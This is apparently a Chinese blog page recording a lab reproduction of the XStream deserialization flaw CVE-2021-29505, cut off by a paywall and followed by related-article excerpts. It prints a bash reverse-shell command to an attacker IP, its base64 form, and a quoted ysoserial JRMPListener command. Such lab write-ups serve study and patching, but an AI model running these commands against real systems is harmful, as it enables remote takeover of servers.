记录自己的漏洞复现:XStream远程代码执行复现(CVE-2021-29505)

最新推荐文章于 2025-02-08 14:31:11 发布
原创 最新推荐文章于 2025-02-08 14:31:11 发布 · 1.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #java

本文介绍XStream 1.4.16及之前版本中存在的远程代码执行漏洞CVE-2021-29505,并详细展示了如何利用此漏洞获取目标系统的shell,最后提供了修复建议。

XStream远程代码执行复现(CVE-2021-29505)

链接: https://blog.youkuaiyun.com/DTSknanLP.

漏洞描述

XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。
XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16 及之前版本黑名单存在缺陷,攻击者可利用sun.rmi.registry.RegistryImpl_Stub构造RMI请求,进而执行任意命令。
一些其他相关漏洞:https://paper.seebug.org/1543/

(本漏洞笔者的观点是:通过POC使得靶机访问攻击机某一端口A,
此时A端口ysoserial实施攻击并监听另一端口B,目标反弹shell至攻击机端口B,完成复现)

测试环境及工具

Ubuntu18.04:IP-192.168.202.141
kali20:IP-192.168.202.128
ysoserial.jar: https://pan.baidu.com/s/1XflBuWFo-RkHUSkMQehLpg/提取码:tbp4

复现过程

Vulhub环境搭建后,进入root用户,然后对应目录下docker-compose up -d
之后访问http://your-ip:8080,将会得到该画面

获取反弹shell

攻击机kali下载好ysoserial.jar后,
bash -i>& /dev/tcp/192.168.202.128/23333 0>&1
进行base64编码后->
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMi4xMjgvMjMzMzMgMD4mMSA=

最低0.47元/天 解锁文章
Drinking-T
关注
NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208)
0xSec
05-24 1011
NextGen Mirth Connect 4.4.1之前版本存在远程代码执行漏洞,未经身份认证的攻击者可利用该漏洞远程执行代码。
XStream反序列化命令执行漏洞复现CVE-2021-29505
Armandhe的博客
09-13 1287
XStream反序列化命令执行漏洞复现CVE-2021-29505) 我复现漏洞姐姐会不会生气啊,不像我只会心疼哥哥
xstream 远程代码执行CVE-2021-29505
YouthBelief的博客
11-14 1682
这里写目录标题0x01 漏洞描述0x02 影响范围0x03 漏洞复现环境搭建0x04 漏洞修复 0x01 漏洞描述 0x02 影响范围 0x03 漏洞复现 环境搭建 0x04 漏洞修复
XStream远程代码执行-CVE-2021-29505
thelostworld
05-25 489
XStream远程代码执行CVE-2021-29505 )一、简介描述XStream是一种OXMapping技术,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。攻击者可以操纵已处理的输入流并替换或注入对象,从而执行从远程服务器加载的任意代码。二、影响版本:XStream <= 1.4.16三、环境搭建:https://raw.githubusercontent.com/vulhub/vulh
XStream远程代码执行漏洞
m0_57768075的博客
06-18 1602
受影响系统: XStream XStream < 1.4.16 描述: -------------------------------------------------------------------------------CVE(CAN) ID: CVE-2021-21345 XStreamXStreamXstream)团队的一个轻量级的、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。XStream 1.4.16之前版本存在远程代码执行漏洞远程
Xstream漏洞复现CVE-2021-29505
Ashely的博客
09-24 3863
Vulhub漏洞环境搭建 拉取漏洞镜像 复现漏洞 一、Vulhub漏洞环境搭建 详见文章Vulhub靶场搭建(Centos7) 二、拉取漏洞镜像 1.进入到vulhub/Xstream/CVE-2021-29505目录下,执行 docker-compose up -d 等待拉取镜像。(默认拉取镜像速度很慢,建议换源,可参考https://blog.youkuaiyun.com/weixin_30565327/article/details/101108079) 2. ...
XStream 代码问题漏洞CVE-2021-21345)
FCH的博客
08-07 738
目前厂商已发布升级补丁以修复漏洞,建议受影响的用户,及时升级至1.4.16及以上版本。补丁获取链接:https://x-stream.github.io/download.html。这里我们在这边利用 exclusion 排除weixin-java-mp的子依赖,然后再单独引入指定版本的xstream。1,在idea中全文件搜索xstream中没有搜索到,可以在 idea tearminal 中执行命令,查找对应的依赖。xstream:jar:1.4.20 >= 官方建议升级版本1.4.16。
CVE-2021-29505 XStream远程代码执行漏洞复现
m0_56642842的博客
07-29 2262
0x00 简介 XStream是一个常用的Java对象和XML相互转换的工具,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,大大简化了XML序列化工作。 0x01 漏洞概述 XStream官方发布安全更新,修复了多个XStream 反序列化漏洞,其中就包含了CVE-2021-29505。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2021-29505反序列化代码执行漏洞等。漏洞复杂度低,
XStream 反序列化命令执行漏洞CVE-2021-29505
EC_Carrot的博客
08-21 907
漏洞简介 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16 及之前版本黑名单存在缺陷,攻击者可利用sun.rmi.registry.RegistryImpl_Stub构造RMI请求,进而执行任意命令。 漏洞复现 我们需要自己的服务器上使用ysoserial的JRMPListener启动一个恶意的RMI Registry: java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099
Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程
weixin_30871701的博客
09-08 657
Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程 参考文档:  S2-052的POC测试,高危Struts REST插件远程代码执行漏洞(S2-052)   http://blog.youkuaiyun.com/xwbk12/article/details/77862527?locationNum=3&fps=1  i春秋的报告...
CVE-2021-29505XStream远程代码执行漏洞通告
爱国小白帽
05-17 2269
报告编号:B6-2021-051703 报告来源:360CERT 报告作者:360CERT 更新日期:2021-05-17 1 漏洞简述 2021年05月17日,360CERT监测发现XStream官网发布了XStream安全更新,漏洞编号为CVE-2021-29505漏洞等级:严重,漏洞评分:9.8。 XStream是一种OXMapping技术,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。 对此,360
XStream 反序列化命令执行漏洞复现CVE-2021-21351)
Vitaminapple的博客
04-19 2420
XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。
【已验证】CVE-2021-29505XStream远程代码执行漏洞通告
爱国小白帽
05-23 1565
报告编号:B6-2021-052101 报告来源:360CERT 报告作者:360CERT 更新日期:2021-05-21 1 更新概览 360CERT目前已经完成漏洞复现及poc验证。本次更新漏洞状态及复现截图。 具体更新详情可参考漏洞详情。 2 漏洞简述 2021年05月17日,360CERT监测发现XStream官网发布了XStream安全更新,漏洞编号为CVE-2021-29505漏洞等级:严重,漏洞评分:9.8。 攻击者可以构造特殊的xml请求包,使存在漏洞的服务器从攻击者控制的远程服务器加载恶
XStream 高危漏洞合集,XStream 组件反序列化漏洞
紫枫的博客
11-27 3167
CVE-2021-29505反序列化代码执行漏洞
关于XStream < 1.4.14 远程代码执行高危漏洞CVE-2020-26217)的详细验证方法
Lisoning的博客
02-08 911
注:本文仅可用于学习使用。XStreamJava 类库,用来将对象序列化成 XML ( JSON )或反序列化为对象。攻击者通过构造恶意的 XML,在受影响的 XStream 版本中绕过默认黑名单,触发远程代码执行
腾讯蓝军安全通告|XStream远程代码执行漏洞(CVE-2021-29505)
Tencent_SRC的博客
05-17 5978
前言上周五XStream官方发布安全更新,由于官方把需要公告的CVE-2021-29505(任意代码执行漏洞)链接贴错成了CVE-2020-26258(SSRF漏洞)链接,导致很多人没有重...
【已复现XStream 拒绝服务漏洞(CVE-2022-41966)安全风险通告
smellycat000的专栏
12-28 5481
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告XStream是一个Java对象和XML相互转换的工具,用来将对象序列化成XML(JSON)或将XML反序列化为对象,并提供所有的基础类型、数组、集合等类型直接转换的支持。近日,奇安信CERT监测到XStream中存在拒绝服务漏洞(CVE-2022-41966)XStream在将XML反序列化为对象时存在堆栈溢出,未...
xstream 远程代码执行 CVE-2021-29505 已亲自复现
qq_42430287的博客
12-26 2204
burp发送数据包后,会返回500状态码,未发送前是200,可以根据此来判断是否存在漏洞点。
CVE-2021-21351 XStream反序列化远程代码执行漏洞
m0_56642842的博客
08-13 3184
0x00 简介 XStreamJava类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。它是一种OXMapping 技术,是用来处理XML文件序列化的框架在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。 0x01 漏洞概述 在 1.4.16 版本之前的 XStream 中,存在一个漏洞,允许远程攻击者仅通过操纵处理后的输入流,解组时处理的流包含类型信息以重新创建以前编写的对
XStream 远程代码执行漏洞(CVE-2021-29505)漏洞分析
最新发布
06-26
CVE-2021-29505 描述了 XStream 在处理恶意构造的 XML 输入时存在远程代码执行(RCE)漏洞。攻击者可以通过精心设计的 XML 文档,绕过 XStream 的黑名单机制,触发任意类的实例化,从而导致任意代码执行。 该漏洞的...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值